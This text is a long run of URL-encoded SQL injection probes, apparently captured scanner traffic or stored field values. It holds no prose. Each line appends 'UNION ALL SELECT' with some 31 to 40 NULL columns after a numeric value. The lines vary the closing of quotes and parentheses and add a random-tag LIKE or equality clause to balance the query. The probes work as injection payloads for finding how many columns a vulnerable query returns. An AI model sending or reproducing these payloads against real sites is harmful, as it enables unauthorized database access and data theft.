1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27YlVZ%27%20LIKE%20%27YlVZ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27GwaO%27%20LIKE%20%27GwaO 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27uQbk%27%20LIKE%20%27uQbk 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27uaFJ%27%20LIKE%20%27uaFJ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27nfRk%27%20LIKE%20%27nfRk 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27gimO%27%20LIKE%20%27gimO 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27LIZI%27%20LIKE%20%27LIZI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27yaqn%27%20LIKE%20%27yaqn 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27bouP%27%20LIKE%20%27bouP 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27apJz%27%20LIKE%20%27apJz 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27uUtq%27%20LIKE%20%27uUtq 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TLop%27%20LIKE%20%27TLop 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27sJsV%27%20LIKE%20%27sJsV 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27oWJU%27%20LIKE%20%27oWJU 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27fsLt%27%20LIKE%20%27fsLt 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Ottx%27%20LIKE%20%27Ottx 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27kXet%27%20LIKE%20%27kXet 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27iXpR%27%20LIKE%20%27iXpR 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27BveP%27%20LIKE%20%27BveP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27SGQg%27%20LIKE%20%27SGQg 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27yYpM%27%20LIKE%20%27yYpM 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Mbrz%27%20LIKE%20%27Mbrz 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ADrx%27%20LIKE%20%27ADrx 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27CrSJ%27%20LIKE%20%27CrSJ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Dlzr%27%20LIKE%20%27Dlzr 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27AIBj%27%20LIKE%20%27AIBj 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27uOqG%27%20LIKE%20%27uOqG 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27dWwB%27%20LIKE%20%27dWwB 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27uckq%27%20LIKE%20%27uckq 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27lLZX%27%20LIKE%20%27lLZX 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27MLSS%27%20LIKE%20%27MLSS 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22nsld%22%3D%22nsld 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22IEhP%22%3D%22IEhP 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VwBK%22%3D%22VwBK 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22XmGr%22%3D%22XmGr 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22cOtW%22%3D%22cOtW 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22bQXH%22%3D%22bQXH 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ynuq%22%3D%22ynuq 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22BuZi%22%3D%22BuZi 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22nxYW%22%3D%22nxYW 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22fBAE%22%3D%22fBAE 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22hbrF%22%3D%22hbrF 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22SuYz%22%3D%22SuYz 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22qjTU%22%3D%22qjTU 